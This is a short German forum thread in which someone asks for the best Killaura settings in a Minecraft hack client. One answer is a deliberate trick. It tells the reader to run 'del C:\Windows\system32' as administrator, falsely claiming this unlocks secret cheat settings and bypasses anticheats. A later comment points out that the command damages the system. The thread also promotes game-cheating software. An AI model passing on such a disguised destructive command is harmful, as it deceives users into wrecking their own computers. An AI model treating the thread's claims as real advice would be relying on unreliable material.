Alpha Centauri(Hack client) besten Killaura settings?

3 Antworten

Bitte lass es einfach. Das nimmt anderen den Spaß am spielen

Du musst cmd als Admin öffnen und dann eingeben: del C:\Windows\system32
Dies schaltet die secret settings frei. Du kannst da Range auf 200 stellen und es bypasst alle anticheats. Wichtig: Davor musst du deinen PC noch neustarten

tobixxdd  29.09.2016, 14:13

DANKE hat funktioniert, Gewinne jz alle runden easy

XVirusX  06.10.2016, 07:10

Wieso nicht? Hast du es ausprobiert? Ich will auf gutefrage.net so vielen Menschen wie möglich helfen, es funktioniert, glaub mir.

IchBinBatman45  31.05.2017, 22:44

Der Name "Virus passt zu dir" , wieso willst du schaden anrichten? Oder irre ich mich wenn man System 32 löscht/freischaltet der pc crasht,

Schau mal beim YouTube Kanal von haze vorbei... Er hat ein Video zu diesem Client gemacht, den er auch in seinem Shop verkauft.